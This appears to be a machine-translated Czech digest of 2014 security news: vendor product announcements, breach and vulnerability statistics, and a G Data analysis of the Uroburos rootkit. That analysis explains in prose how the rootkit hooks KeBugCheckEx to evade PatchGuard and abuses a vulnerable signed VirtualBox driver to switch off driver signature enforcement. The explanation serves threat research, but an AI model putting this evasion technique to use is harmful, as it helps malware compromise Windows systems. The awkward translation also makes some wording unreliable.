"Když si koupíte předplatné internetový měli byste mít přístup k veškerému obsahu, a měli byste ji dostat při rychlosti, kterou jste zaplatili za. To je to, co by mělo být otevřený internet, a všichni Evropané by měli mít přístup k němu, "uvedl místopředseda Evropské komise Neelie Kroesová k tomu zjištění, které posilují důkazy ohlášené Sdružení evropských regulačních orgánů v oblasti elektronických komunikací v roce 2012 na čisté neutrality a otevřeného internetu . "Mým cílem je chránit spotřebitele tím, že zajistí otevřený internet v celé Evropě, a tím, že jim nová práva a transparentnost, pokud jde o jejich připojení k internetu," řekla Kroesová. "Mým cílem je také chránit inovace, takže každý může inovovat na otevřeném internetu a spolu internetu bez poškození ji. To by v konečném důsledku podpořit větší konkurenci a výběr ve prospěch spotřebitelů." navrhované Připojeno Nařízení Komise Continent (MEMO / 13/779) si klade za cíl vytvoření jednotného trhu pro Internet a komunikace. Návrh je v současné době projednávána zákonodárci Evropské unie (Evropský parlament a Rada). Tento návrh by měl přinést otevřený internet pro všechny občany v Evropě a zvýšit transparentnost tím, vyžadující, aby operátoři poskytují svým zákazníkům přesné informace o rychlosti a kvalitě internetové služby, které poskytují. To by ukončily diskriminační blokování a škrcení a poskytovat účinnou ochranu otevřeného internetu. Stanoví jasná pravidla pro řízení dopravy, kterým se zakazuje takové řízení, s výjimkou mimořádných okolností. To také umožňuje poskytování "specializovaných služeb", jako high definition video služeb a služeb elektronického zdravotnictví, které podporují inovace a možnost výběru na trhu s telekomunikacemi, ale umožňuje jim způsobem, který zachovává kvalitu všeobecného přístupu k internetu. Použití tohoto přístupu, by provozovatelé nadále mohli soutěžit o spotřebitele o ceně a rozdílů v kvalitě (např. různé rychlosti internetu nebo objemy dat), aby co nejlépe vyhovovaly potřebám zákazníků.


E-mail objev ekosystém a prevence cyberthreat
8.3.2014 Hrozby | Bezpečnost
Agari oznámil Agari PRO, postavený na společnosti cloud-based SaaS datové platformy, která pomáhá společnostem zjistit, přijmout opatření, a zabránit pokročilé e-mailové hrozbách, které jsou zaměřené na koncové uživatele dnes.

Agari PRO je řešení ochrany e-mailu kanál, který poskytuje globální značky se e-mail ekosystému objev, odhalení cyberthreat a prevence, hrozby a monitorování infrastruktury a varování, a nabízí žalovatelné sanace pracovní postupy pro prevenci hrozeb. Postavený na své síti detekce v reálném čase, Agari PRO zákazníci získat okamžitý a bezprecedentní viditelnost do všech e-vysílajících domén, které jsou ve vlastnictví, oprávněnou třetí stranu, nebo škodlivé. síť Agari v real-time detekce je povoleno DMARC, s bezpečnostní normou e-mail, že je vidět rychlé přijetí, s podporou 85% schránek v USA a 60% schránek po celém světě. . DMARC umožňuje značek být pod kontrolou jejich e-mailové kanálu a definitivně sdělit přijímačů, které e-mailu je od nich a který e-mail není Klíčové vlastnosti Agari PRO zahrnují:

Detekce útoku a vizualizace: detekce v reálném čase a inteligence na hrozbách, včetně podezřelé URL a IP adres, umožňujících bezpečnostní týmy, aby přijaly okamžitá opatření
Proaktivní sanace workflow: Agari je veden workflow nabízí jasné kroky, jak vyřešit bezpečnostní problémy, nástroje a pracovní postupy pro zavádění a sledování e-mailovou ověřování v rámci infrastruktury klienta
Prevence hrozeb: S plným nasazením, e-mail hrozbách jsou zakázány, a data jsou sdílena pokusů a zmařených útoků ISP poskytnout úplný přehled
"S poslední titulky představí, že e-mail je zřejmé, že cybercriminal oblíbený cíl útoku, by mohla naše řešení nemůže být více relevantní," řekl Patrick Peterson, CEO a zakladatel společnosti Agari. "Převedením na světě e-mailových schránek do sítě detekce v reálném čase, vidíme hrozby okamžitě a sdílet data jsme analyzující - 4500000000 zpráv denně -. umožnit okamžitou akci a prevence hrozeb.


CeBIT bude ve znamení bezpečné komunikace

8.3.2014 Kongresy
První ročník veletrhu CeBIT v post-Snowdenovské éře se zaměří na bezpečnost, zejména pak na ochranu mobilních zařízení proti odposlouchávání.

Pokračující špionážní aféra americké Národní bezpečnostní agentury přispěla k tomu, že se bezpečnost stala jedním z hlavních témat letošního veletrhu CeBIT, který se již tradičně uskuteční ve dnech 10. až 14. března 2014 v německém Hannoveru. Svými produkty se příští týden hodlá na CeBITu prezentovat téměř 500 bezpečnostních firem. Seznam obsahuje taková jména jako SecuSmart, Digittrade či Datev.

Zájem o produkty SecuSmart značně vzrostl poté, co německá kancléřka Angela Merkelová začala používat ve svém BlackBerry 10 pro ochranu komunikace nástroj SecuSuite. Tato služba umožňuje šifrování hlasových hovorů i datové komunikace. Používá kartu microSD se 4GB pamětí flash pro ukládání šifrovaných dokumentů a malou čipovou kartu pro realizaci šifrování. Letos pak společnost hodlá představit celou řadu produktů pro ochranu před odposlechy.

Na CeBITu budou k vidění také různé alternativy k populárním chatovacím aplikacím typu WhatsApp. Konkrétně v případě WhatsApp se totiž poté, co se služba stala majetkem Facebooku, objevují hlasy doporučující uživatelům přechod na jinou bezpečnější aplikaci. Například Digittrade se tak hodlá pochlubit aplikací Chiffry, která nabídne šifrované zprávy i telefonování.

Obě výše zmíněné společnosti mají své kořeny v Německu a tohoto faktu hodlají využít i při propagací svých bezpečnostních novinek.

Bezpečná komunikace však není jen záležitostí šifrování. Ošetřen musí být i přístup k zařízením a aplikacím. Oblíbenou alternativou ke kódům PIN se stávají čtečky prstů nebo odemykání obrazovky pomocí určitého zaklepání, které nabízejí produkty od LG. Zcela jiný způsob pak hodlá představit společnost Datev – čtečku čipových karet, která se k uživatelským zařízením bude připojovat přes rozhraní Bluetooth. Na CeBITu chce firma technologii předvést třeba na iPadu.


Uroburos - Deeper cestování do zmírnění ochrany jádro

7.3.2014 Viry
Malware využívá novou technologii obejít ochranu jádra systému Windows '
Uroburos již byla popsána jako velmi sofistikované a vysoce komplexní malware v našem datovém červeném papíru G, kde jsme měli podívat na chování malware. Tento předpoklad je opět podporován, při pohledu na jeho instalačního procesu. Uroburos používá techniku ​​dosud známé veřejnosti, aby se vyhnula Driver Signature Enforcement Microsoft, podstatnou část zabezpečení systému Windows ".
V první řadě bychom chtěli poslat pozdravy a díky lidé jsou aktivní na kernelmode.info fóru , zejména R136a1 a EP_X0FF. Poskytli zdatní analýzu Podpis prosazování Driver obchvatu, která obohacuje celkový pochopení věci.

Úvod
Následující článek analýza je úzce spojena s Rudou knihu G Datovy o Uroburos, zveřejněné v pátek 28 února. Papír si můžete stáhnout zde: https://www.gdata.de/rdk/dl-en-rp-Uroburos
Pro kolegy výzkumníky, zajišťujeme hash vzorku použitého pro tuto následnou článek:
SHA256: 33460a8f849550267910b7893f0867afe55a5a24452d538f796d9674e629acc4
Tento soubor je 64-bit driver, sestaven v roce 2011.

Kernel Patch Protection
Definice

Většina rootkitů používat především úpravy jádra nebo jádro záplatování, aby zakryli své činnosti a změnit chování infikovaného systému. Chcete-li chránit operační systém Windows, Microsoft přidal nové technologie k jeho 64-bit Windows verze. Technologie jádra Patch Protection (aka PatchGuard) kontroluje integritu jádra systému Windows, aby se ujistil, že žádné důležité součásti jsou modifikovány. V případě, že je zjištěn škodlivý modifikace jádra, funkce KeBugCheckEx () je vykonán, volána s argumentem s hodnotou 0x109 (CRITICAL_STRUCTURE_CORRUPTION) jako chyba kódu. Výsledkem je vypnutí systému s modrou obrazovkou.

Microsoft uvádí, že technologie, ochrana proti změnám jádra zabraňuje následující úpravy:
• měnit tabulky systémových služeb, například tím, hákování tabulky KeServiceDescriptor
• upravit přerušení Descriptor Table (IDT)
• upravit Global Descriptor Table (GDT)
Stohy • využití jádra, které nejsou přidělovány podle jádra
• náplasti jakákoliv část jádra

Uroburos zmírnění

Vývojáři Uroburos 'používá stejné vložené háčky, bylo vysvětleno v předchozím červeném papíru , aby se vyhnula Kernel Patch Protection. Cílem útočníka je háček funkci KeBugCheckEx (), aby se zabránilo manipulaci s bug kód 0x109.
Screenshot níže ukazuje fragment kódu, ve kterém je adresa KeBugCheckEx () uloženou v qword_787D8

Adresa Screenshot z KeBugCheckEx ()
Adresa Screenshot z KeBugCheckEx ()

Následující obrázek ukazuje, že Uroburos kontroluje, zda chyba kód rovná 0x109 V případě, že chcete získat další informace týkající se techniky používané vývojáři, doporučujeme následující odkaz:

Screenshot: Řízení hodnoty chyba kódu je
Screenshot: Řízení hodnoty chyba kódu je

www.codeproject.com/Articles/28318/Bypassing-PatchGuard

Podpis Prosazování Driver
Definice

Rootkity jsou většinou řidiči, který používají k práci v prostoru jádra. Aby se zabránilo tento druh malware, Microsoft vytvořila Driver zásady podepisování za jeho 64-bitových verzích Windows Vista a novějších verzích. Chcete-li načíst ovladače, musí být soubor. Sys podepsané oprávněným vydavatelem.
Vývojáři mohou zakázat vynucení proces Driver Signature během vývojové fáze řidiče, což znamená, že developer nemusí podepsat každou zkompilovanou verzi ovladače během vývojové fáze. V tomto případě, stolní stroje se změní a zobrazí se následující zpráva v pravém dolním rohu: "Test Mode". Vlajka, s níž je uložen aktuální stav politiky se nazývá g_CiEnabled. Hodnota g_CiEnabled je během spouštěcí fáze systému Windows, a považován za "statické" v běhu. To znamená, že Windows předpokládá, že hodnota je nastavena správně a nemění se v průběhu běhu.

Uroburos zmírnění

Vývojáři Uroburos 'používá nové techniky pro zakázání vynucení podpisu ovladače. V našem případě se používá chybu zabezpečení v legitimně podepsané ovladače zakázat politiku! Během instalace Uroburos, ovladač Oracle VirtualBox (verze 1.6.2) je nainstalován na cílené systému. Tento ovladač (VBoxDrv.sys) je podepsáno: Následně zabezpečení v tomto ovladači (CVE-2008 - 3431) se používá k přepsání režimu jádra adresu s 0 z uživatelského prostoru (pomocí DeviceIoControl ()). V našem případě, že útočníci použili tuto chybu zabezpečení zneužít k přepsání g_CiEnabled a zakázání vynucení podpisu ovladače, zatímco systém byl spuštěn, a tím mění hodnotu od 1 (= true) na 0 (= False). Což vede k systému Windows věřit, že to běží v testovacím režimu. V testovacím režimu to není žádný velký problém načíst ovladač rootkit bez předchozího upozornění.

Screenshot: VBoxDrv.sys podpis
Screenshot: VBoxDrv.sys podpis

Závěr
Dříve jsme tvrdili, že Uroburos je velmi komplexní a velmi sofistikovaný malware, programuje kvalifikovaných lidí. Tento předpoklad je potvrzen ještě jednou podle výše uvedené analýzy Uroburos "instalační techniky.
Vývojáři museli vypořádat s prosazováním zabezpečení systému Microsoft Windows. Museli najít způsob, jak obejít technologii Kernel Patch Protection a také prosazování Driver Signature. Technika používaná k obejít ochranu proti změnám jádra byla zdokumentována na internetu, a proto není zcela nová.

Ale o uplatňování Driver Signature, je to poprvé, co jsme vidět malware using zranitelnost ve legitimně podepsaný ovladač zakázat jeho užívání je
Tento příklad ukazuje, omezení procesu podpisu. Obecně platí, že datum vypršení platnosti podpisu je nastaven na stát, několik let po datu vytvoření. V případě, že je zjištěno jakékoliv zranitelnosti, patch je k dispozici, ale starý binární je stále k dispozici a platné, v případě, že je certifikát odvolán autorem / autora podpisu a nastavit na CRL, na seznamu zneplatněných certifikátů .

Ale, zrušení podpis je pouze prvním krokem v procesu ochrany, protože každý systém, který musí zkontrolovat podpis musí mít přístup k až k dnešnímu dni CRL.
A i v případě, že je systém aktualizovaný seznam CRL, Uroburos Autoři jsou jistě myslel, že je dostatečně zručný manipulovat s ověřovací proces operačního systému je použití bez upozornění uživatele.
Tak, to je poprvé, co vidíme ty dvě techniky obejít mechanismy ochrany systému Windows "v divočině. Očekáváme, že budou používány další malware v budoucnosti, samozřejmě.


Webroot poskytuje APT ochranu pro podniky
7.3.2014 APT
Webroot oznámila vydání BrightCloud Security Services a BreachLogic Endpoint Agent, dvěma bezpečnostními nabídky cloudových, jejichž cílem je pomoci organizacím řešit prudký růst a rostoucí sofistikovanost on-line hrozeb, zejména cílených útoků jako "spearphishing" a pokročilé přetrvávající hrozby (Apts).
 

Při boji proti cílené útoky, jeden z hlavních otázek, podniky čelí, je neschopnost sladit neobvyklé události v jejich IT prostředí s aktuální, přesné a žalovatelné bezpečnostní inteligenci, takže je obtížné určit, zda a kde existuje hrozba. Vzhledem k tomu, malware je obvykle součástí těchto pokročilých útoků, to je také důležité, aby podniky pochopit chování aplikací běžících na svých koncových bodů, a pověst souborů, které vstupují do životního prostředí. BrightCloud Bezpečnostní služby předefinovat on-line hrozbách. Sada cloud-based služeb, poháněný vlastním učení pro analýzu ohrožení platformu, která neustále skenuje na internetu, je navržen tak, aby podnikům a technologické partnery OEM posílit jejich bezpečnostní technologii s přesným a žalovatelné hrozeb inteligence. Vylepšená sada obsahuje nový soubor Reputation Service a obohacené kontextové databázi, která koreluje dříve různorodých zabezpečení datových bodů. Tradiční, reaktivní, seznam založené zabezpečení, který pracuje tím, že uznává známých hrozeb je neschopný zastavit moderní malware, který je účel-postavený k útoku jediný cíl. BrightCloud Bezpečnostní služby používat novou inteligenci trojrozměrný ohrožení přístup k identifikaci a zastavit tyto sofistikované hrozby. Tento přístup zahrnuje:
 

Šířka služeb k pokrytí všech kritických zdrojů ohrožení - internet, souborů a mobilní
Cloud-based velká dat architektura v reálném čase hrozby inteligence
Větší hloubka analýzy korelace různorodá data.
Brightcloud Bezpečnostní služby zahrnují Web Reputation, webové Klasifikace, IP pověst, reputaci souborů v reálném čase, Anti-Phishing, Mobile App Reputation, Mobile Security SDK, a SecureWeb prohlížeče SDK. Jsou dodávány prostřednictvím OEM partnerů webroot - včetně mnoha předních poskytovatelů síťové bezpečnosti - pomocí jediného rozhraní API, které jim umožní chránit své zákazníky v okamžiku pravdy, kdy pokročilé kybernetické útoky se objeví uvnitř i vně svých sítí. Všechny tyto služby využívají Naprostá bezpečnost inteligence tzv. cloud-based Webroot Intelligence Network, který neustále zachycuje, analýzy, třídí a publikuje zpravodajství na URL adresy, IP adresy, mobilní aplikace a soubory, a analyzuje nejen chování, ale také koreluje vztahy renomovaným a nebezpečné webové servery, IP, soubory a mobilní aplikace prostřednictvím proprietárního srovnávací motoru. BreachLogic Endpoint Agent poskytuje stejnou cloud-based analýzy hrozeb v řešení pro zabezpečení koncových bodů příští generace pro klienty, servery a mobilní zařízení. Poskytuje včasnou detekci a blokování pokročilé útoky škodlivého softwaru a umožňuje rychlé vyšetřování a nápravu v případě porušení. Sledováním koncových aplikací, procesů a událostí před Webroot ohrožení inteligence, to uznává a zastaví se nikdy předtím neviděl hrozby, které mohou projít nekontrolovaná stávající sítě a bezpečnostních technologií koncového bodu. Navrženo integrovat do stávajícího IT prostředí, BreachLogic Endpoint Agent doplňuje síť bezpečnostní technologie a antiviry v koncových bodech, poskytuje další vrstvu ochrany proti útokům, které infiltrují nebo obejít hranice sítě. kontinuální monitoring The BreachLogic Endpoint agenta poskytuje přehled o koncových aplikací, událostí a procesů, a vztahuje se real-time chování a kontextovou analýzu z Webroot Intelligence Network identifikovat stávající narušení a zabránit budoucím útokům. Bezpečnostní týmy mohou snadno spravovat koncových upozornění s webovým Webroot konzole nebo integrovat koncových dat webroot do svého stávajícího managementu životního prostředí. BreachLogic Endpoint Agent také poskytuje podrobné údaje o soudní pomoci bezpečnostní týmy vyšetřovat zdroj a rozsah porušení identifikovat slabá místa a zabránit budoucí infiltraci.


Android, iOS řešení odhaluje dat netěsnící aplikace
7.3.2014 Mobil
Váš mobilní přístroj ví o tobě všechno. Ale jak dobře víte, že vaše mobilní zařízení? Začátek dnes, může se zdatným spotřebitelům skutečně převzít kontrolu svých osobních informací o svých zařízeních -. Instalací viaProtect z viaForensics Na rozdíl od tradičních mobilních bezpečnostních aplikací, které využívají databázi známých škodlivých aplikací na obrazovku pro viry a malware, viaProtect sleduje všechny aplikace pro mobil rizika. Například, viaProtect lze zjistit, zda aplikace zpracovává vaše osobní údaje nejistě přenosem je nešifrované, nebo na serverech umístěných v zahraničí. viaForensics odhaduje, že až 75 procent z aplikací je "děravý", nebo nejistá.
 

Zatímco malware a počítačové viry jsou hlavní hrozby pro PC, děravé a nezabezpečené aplikace jsou skutečná rizika osobních údajů na mobilních zařízeních. Tyto aplikace předávat informace v různých rizikových způsoby - např. bez šifrování nebo zámořských serverů, které umožňují údaje, které mají být zachyceny nežádoucími osobami. Kruté důsledky mohou zahrnovat krádež identity, finanční krádež a ztrátu soukromí. viaProtect shromažďuje mobilní soudní systém,, sítě, zabezpečení a senzorů dat ze zařízení, pak využívá statistické analýzy a ukazatele rizika odhalit podezřelé události či chování. To znamená, že aplikace je možné sledovat v reálném čase odhadnout potenciální rizika či problémy-spíše než jen kontrolu známých škodlivých aplikací. viaProtect používá skutečné analýzy čase odhalit chování, které je podezřelé a potenciálně riskantní. Uživatelé budou:
 

Získejte hodnocení rizik zařízení - jednoduchá skóre, které jim umožňuje vědět, zda jejich data jsou v bezpečí
Naučte se, jak telefony a tablety jsou odesílání dat - včetně toho, co data jsou odesílána nejistě
Objevte přesně tam, kde je jejich odesílání dat
Buďte informováni o rizikových úprav zařízení, včetně rozpoznání kořenů
Být upozorněni na děravé a nejistých aplikace
Kromě toho, palubní desky na bázi prohlížeče umožňuje více zařízení monitorovat z jednoho účtu -. Ideální pro rodiny s dětmi viaProtect byl také postaven od základu tak, aby podporoval oba iOS a Android platformy. Vzhledem k tomu, iOS je méně náchylné k útokům virů, to historicky bylo pod-sloužil mobilní bezpečnostní řešení. Nicméně, děravé aplikace jsou stejně běžné jako na iOS zařízeních Android, takže viaProtect nezbytný nástroj pro každé platformě. aplikace, které budou představeny v Severní Hall stánku # 2627 na konferenci RSA 2014 je zdarma pro osobní použití. Veřejné náhled lze stáhnout z Apple App Store nebo Android je Google Play Store.


Enterprise-level UTM pro domácnosti a malé kanceláře
7.3.2014 Hardware
WatchGuard Technologies oznámila, že řešení WatchGuard Firebox T10 Unified Threat Management (UTM), síťové zabezpečení zařízení, které umožňuje podnikům rozšířit výkonné zabezpečení sítě pro malé a domácí kanceláře (SOHO) prostředí.

70 procent zaměstnanců s vysokou přidanou hodnotou práce doma, alespoň jednou týdně, nové řešení umožňuje správcům sítě, aby zajistila robustní ochranu zaměstnanců, kteří jsou často spravují nejkritičtější duševního vlastnictví společností. Firebox T10 nabízí WatchGuard je cloud-based RapidDeploy schopnost, která okamžitě self-konfiguruje a začne hlásit zpět do středové konzole správce pouhým připojením přístroje. Podle nedávného globálního WatchGuard průzkumu IT odborníků, více než 82 procent umožnit zaměstnancům přístup k podnikové síti z malé kanceláři nebo Poloha domácí kancelář. Nicméně, téměř 30 procent nevyžadují bezpečnostní brány zařízení. Pro ty, kteří to pouze 23 procent vyžadují použití bezpečnostních produktů podobné těm, které používají v podnikové centrále, s funkcemi, jako je Intrusion Prevention, AntiVirus, Data Loss Prevention, kontrolu aplikací, antispam, a další. (Klikněte zde pro zobrazení kompletní SOHO bezpečnostní infographic.) V téže studii, WatchGuard také zjistil, že 56 procent cítí základní přístup VPN poskytuje potřebnou ochranu proti dnešním SOHO hrozeb. ředitel WatchGuard bezpečnostní strategie, Corey Nachreiner, říká, že přístup k VPN není kompletní zabezpečení. "Přístup k VPN již dlouho standardem pro ochranu komunikace pro zaměstnance z domova," řekl Nachreiner. "Nicméně, pokud je váš koncový bod zařízení není chráněno na stejné úrovni jako váš podnik síti VPN tunel pouze poskytuje otevřené okno do vašeho podnikání. Musíte se chránit jak a Firebox T10 navržena tak, aby, že jednoduché a nákladově efektivní . " Jak Firebox T10 valí ven na trhu, WatchGuard předpokládá malý, cenově efektivní řešení bude také apelovat na zákazníky, kteří chtějí plnou ochranu UTM pro mobilní kiosků a vozíky, takový jak ti používali v maloobchodních a zdravotnických prostředích, které se pravidelně zpracovávají kreditní karty a osobní údaje -., a musí splňovat stejné přísné PCI a dodržování standardů HIPAA jako větších kanceláří a podniků řešení přináší nejen stejné výkonné UTM možnosti jako větší modely společnosti, včetně funkčnosti RapidDeploy, ale také nabízí společnost je Nové řešení viditelnosti, WatchGuard rozměr. Tato nulová instalaci, cloud-ready nástroj poskytuje v reálném čase bezpečnostní informace, a umožňuje administrátorům mají výhled na big-data-stylu z klíčových hrozeb a použití horní webu přes celé uživatelské základny. Plus, WatchGuard UTM řešení mají plné verze best-of-breed technologií v tomto odvětví, včetně:. Antispam, antivir a filtrování URL Konečně, s Firebox T10 a plnou UTM apartmá na místě, uživatelé nebudou zažít zpoždění obvykle způsobené backhauling provoz důkladné firemní servery pro zajištění ochrany. řešení je nyní k dispozici. Ceny začínají na 395 dolarů USD (cen se může lišit v závislosti na regionu a regulace) - včetně jednoho celého roku ochrany UTM.


University of Maryland stanoví konkrétní kybernetické cíle v důsledku porušení dat
7.3.2014 KyberSecurity
Dotčeným osobám v nedávné narušení dat na University of Maryland se dostat pět namísto jednoho roku zdarma kreditní monitorování, univerzita prezident Wallace D. Loh uvedeno v další prohlášení vydaném v důsledku porušení. On také sdílel jeho plánují zahájit "komplexní, top-to-bottom vyšetřování všech výpočetních a informačních systémů." - jak centrální ty provozované univerzitou, stejně jako místních systémů provozovaných jednotlivými správními a akademických jednotek Šetřením se nejprve prohledá všechny databáze na systému zjistit, co informace, které obsahují. "Existují tisíce databází po celém areálu, před mnoha lety, kdy vytvořené prostředí pro kybernetických hrozeb byl jiný," poznamenal. závislosti na zjištěních, z nichž každá databáze bude buď odstraněna (není-li relevantní a potřebné už) nebo více plně chráněna . Za druhé, od teď na všechny univerzita systémy budou pravidelně se podrobí Penetrační testování. "Za třetí, budeme přezkoumá vhodnou rovnováhu mezi centralizovaným (University-ovládané) proti decentralizovaných (jednotka ovládané) IT systémů. Musí tu být politické změny doprovázet technické opravy, "vysvětlil. "Chápeme potřeby jednotlivých útvarů ovládat své vlastní servery a databáze. Musíme také zajistit, aby záruky na centrální a místní úrovni jsou stejně robustní a dobře koordinovaná." To vše bude provedeno podle Nově vytvořená prezidenta Task Force o kybernetické bezpečnosti, který se bude skládat z odborníků z kampusu univerzity a Maryland Cybersecurity Center. Budou pomáhal zatím nejmenované počítačové bezpečnosti společnost "s pokročilými možnostmi hacking." Revidovaná porušení FAQ sekce také nabízí velmi užitečné informace o tom, jak mohou postižení jedinci aktivovat jejich úvěrového rizika, a že je potřeba pro umístění bezpečnostní zmrazení na jejich kreditní souboru. "Státní a federální orgány činné v trestním řízení, US Secret Service, konzultanti z MITRE Corporation, a našich vlastních univerzitních pracovníků bezpečnostních IT pracují společně, aby zjistili, jak se útočníci pronikli našich více vrstev zabezpečení. Tato forenzní analýza nám umožní bránit proti tomuto typu útoku v budoucnu. bude také poskytnout vodítka k tomu, kdo byli útočníci, " vysvětlil Loh, a dodal, že "není nedobytný bariéra proti každému ďábelsky dovedné kybernetického útoku." "V dnešním digitálním světě, každý z nám musí přijmout přiměřená opatření, aby zajistil svou vlastní informační bezpečnosti. Proto se univerzita představí sérii krádeží identity seminářů pro všechny naše studenty, fakulty, zaměstnanců a absolventů. Semináře-, které budou rovněž zaznamenány a později dány k dispozici on-line budou vybaveny odborníky o tom, jak chránit své citlivé informace, "oznámil.


Programy třetích stran odpovědné za 76% chyb v populární software
7.3.2014 Incidenty | Bezpečnost
Programy třetích stran jsou zodpovědné za 76% zranitelností objevených ve 50 nejpopulárnějších programů v roce 2013, tvrdí, že výsledky ze společnosti Secunia zranitelnost Review 2014, která je založena na vzorku sedmi milionů uživatelů PSI společnosti. Zranitelnost recenze Secunia analýzy globální trendy zranitelnosti, a má mimořádně důkladný pohled na 50 nejoblíbenějších programů na soukromých počítačích - Top 50 portfoliu. Tyto 50 programy prostupují podnikové IT infrastruktury, a to buď jako integrální obchodní nástroje, které jsou schválené, sledovány a udržovány při operacích IT - pro čtenáře, například PDF a internetových prohlížečů, nebo jako aplikace na soukromých zařízení zaměstnanců a managementu, používaných na pracovišti s nebo bez povolení. V těchto 50 nejlepších programů, byly objeveny v roce 2013 celkem 1208 zranitelností. Programy třetích stran byly zodpovědné za 76% takovou zranitelnost, i když jsou tyto programy představují pouze 34% z 50 nejpopulárnějších programů o soukromých počítačů. Podíl programů (včetně operačního systému Windows 7) společnosti v Top 50 je přední 33 produktů - 66%. I tak programy Microsoft jsou zodpovědní pouze za 24% zranitelností v Top 50 programů v roce 2013. Zatímco tam je hojnost zranitelnosti, je důležité zdůraznit, že jedna chyba je všechny hackeři potřebují k porušení bezpečnosti. nedávné a neobvykle dobře zdokumentovaný příklad toho, jak jedna známá zranitelnost může způsobit katastrofu je narušení bezpečnosti v US Department of Energy v roce 2013, které vznikly náklady ve výši 1,6 milionů dolarů a vyústil v krádež osobních informací z 104.000 zaměstnanců a jejich rodin. narušení bezpečnosti v US Department of Energy byl způsoben kombinací manažerských a technologických nedostatků systému - ideální živnou půdu pro hackery, které jim umožní využívat zranitelností přítomných v infrastruktuře. Klíčové poznatky z hodnocení:

76% zranitelností ve 50 nejpopulárnějších programů na soukromých počítačích, v roce 2013 postižených programů třetích stran, zdaleka přečíslení na 8% zranitelností nalezených v operačních systémech nebo 16% zranitelností objevených v programech Microsoft. roce 2012, byla tato čísla 86% (non-Microsoft), 5,5% (operační systémy) a 8,5% (Microsoft).

V 1208 zranitelnosti byly objeveny v 27 výrobků na Top 50 portfoliu.
17. Produkty třetích stran, které představují pouze 34% produktů jsou zodpovědné za 76% zranitelností objevených v Top 50 let. Ze 17 programů třetích stran, 10 byli zranitelní. Z 33 programů společnosti Microsoft v Top 50, 17 byly zranitelné.

Programy společnosti Microsoft (včetně operačního systému Windows 7) tvoří 66% výrobků v Top 50, ale byl odpovědný pouze za 24% zranitelností.
Během pětiletého období, podíl třetích stran zranitelnosti se pohybuje kolem 75% - v roce 2013 to bylo 76%.
Celkový počet zranitelných míst v Top 50 nejpopulárnějších programů byl 1208 v roce 2013, ukazuje nárůst o 45% na 5 roků trendu. Většina z nich byly hodnoceny podle Secunia buď jako "vysoce kritické" (68,2%) nebo "velmi kritické" (7,3%).
V roce 2013, 2289 zranitelné produkty byly objeveny s celkem 13073 chyb v nich.
86% zranitelností v Top 50 měla záplaty jsou k dispozici v den zveřejnění v roce 2013, tedy výkon na opravu koncových bodů je v rukou všech koncových uživatelů a organizací.
79% zranitelností ve všech produktů měla záplaty jsou k dispozici v den zveřejnění v roce 2013.
V roce 2013, 727 zranitelnosti byly objeveny v 5 nejpopulárnějších prohlížečů: Google Chrome, Mozilla Firefox, Internet Explorer, Opera, Safari.
V roce 2013, 70 zranitelnosti byly objeveny v 5 nejoblíbenějších čtenářů PDF: Adobe Reader, Foxit Reader, PDF-XChange Viewer, Sumatra PDF a Nitro PDF Reader.
"To je jedna věc, že ​​programy třetích stran jsou zodpovědné za většinu slabých míst na typické PC, spíše než programy společnosti Microsoft. Nicméně, další velmi důležitý bezpečnostní faktor je, jak snadné je aktualizovat programy společnosti Microsoft v porovnání s programy třetích stran. Docela jednoduše, automatizace se kterou se aktualizace zabezpečení společnosti Microsoft jsou k dispozici koncovým uživatelům - prostřednictvím automatické aktualizace, systém řízení konfigurace a aktualizace služeb - zajišťuje, že se jedná o poměrně jednoduchý úkol k ochraně soukromých počítačů a firemní infrastruktury před zranitelností objevených Microsoft produkty. To není tak s velkým počtem třetích stran dodavatelů, z nichž mnozí nemají buď schopnosti, zdroje nebo bezpečnostní zaměření, jak vydělat aktualizace zabezpečení automaticky a snadno dostupné, "řekl technický ředitel firmy Secunia, Morten R. Stengaard.


44% firem nemají mrak app politiku v místě
7.3.2014 Bezpečnost
Po rozhovorech s 120 RSA konference účastníků, Netskope oznámila výsledky průzkumu o používání informací o zabezpečení profesionálů cloudových aplikací.

Netskope zjistil, že navzdory rozšířenému přijetí cloudových aplikací v podniku, většina bezpečnostních IT odborníci jsou buď neví, cloud app politice své firmy, nebo nemáte. V nepřítomnosti app politiky cloud, více než dvě třetiny účastníků průzkumu uvedlo, že by za zásady ochrany osobních údajů jejich společnosti před stažením aplikace. Jak cloud aplikace množí v podniku, rizika pro bezpečnost a soukromí spojené s používáním těchto aplikací při práci je na vzestupu. Podle nedávného Netskope Cloud zprávy, typický podnik používá 397 aplikací, nebo stejně jako 10 násobek čísla, která typicky má v rámci své kompetence. Navíc, 77 procent z cloudových aplikací nejsou enterprise-ready, takže IT s výzvou zajištění těchto aplikací a uvedení politiky v místě, které řídí jejich použití. průzkum - který poskytuje přehled o uživatele a firemních postupů mezi vzorkem RSA účastníků - nabídl se tyto závěry: Politiky zpoždění i přes rostoucí cloud app přijetí v podniku, když podniky mají více cloudových aplikací v použití zaměstnanců, než kdy předtím, 44 procent dotázaných uvedlo, že jejich firma nemá app politiku mrak na místě. Navíc, 17 procent zaměstnanců si neuvědomuje, pokud jejich firma má politiku. Zaměstnanci chtít, aby zvážila firemní politiku před použitím cloud aplikace Navzdory vzestupu neschválených cloudových aplikací v podniku, také volal "Stín IT," většina respondentů se do pozornost jejich společnost Zásady ochrany osobních údajů před podpisem na app účtu cloud. Sedmdesát procent dotázaných uvedlo, že považují pravidla před procházení nebo bít App Store, což je dobrá zpráva pro firmy, které mají politiky na svém místě. Skladovací a spotřební aplikace jsou vnímány jako IT ne-ne to Když ptal se na vrcholu aplikací, které nemají Chcete-IT vědět, respondentů uvedlo, že skladování a spotřebitelské aplikace jsou top mysli. První tři aplikace, které chtějí, aby se mimo IT je radar jsou: 1. Dropbox (Storage) 2. Twitter (spotřebitele) 3. Facebook (spotřebitele) "To není překvapující, že i když použití cloud app se dovtípil v podniku, většina firem jsou za o zřízení jasné zásady a pokyny, a jako zaměstnanci výsledek jsou ve tmě o důsledcích jejich aplikace využití, "řekl Sanjay Beri, zakladatel a CEO, Netskope. "Díky úžasné výhody, které halí aplikace přinášejí, podniky také nést významná rizika, která již nemůže být ignorována. Očekáváme, že analytics cloud app a provádění politik stala prioritou v příštích měsících jako podniky hledat optimalizovat jejich využití cloudových aplikací s okem na obou agility a bezpečnosti. "


Detekce hrozeb pro vzdálené uživatele by OPSWAT
7.3.2014 ochrany
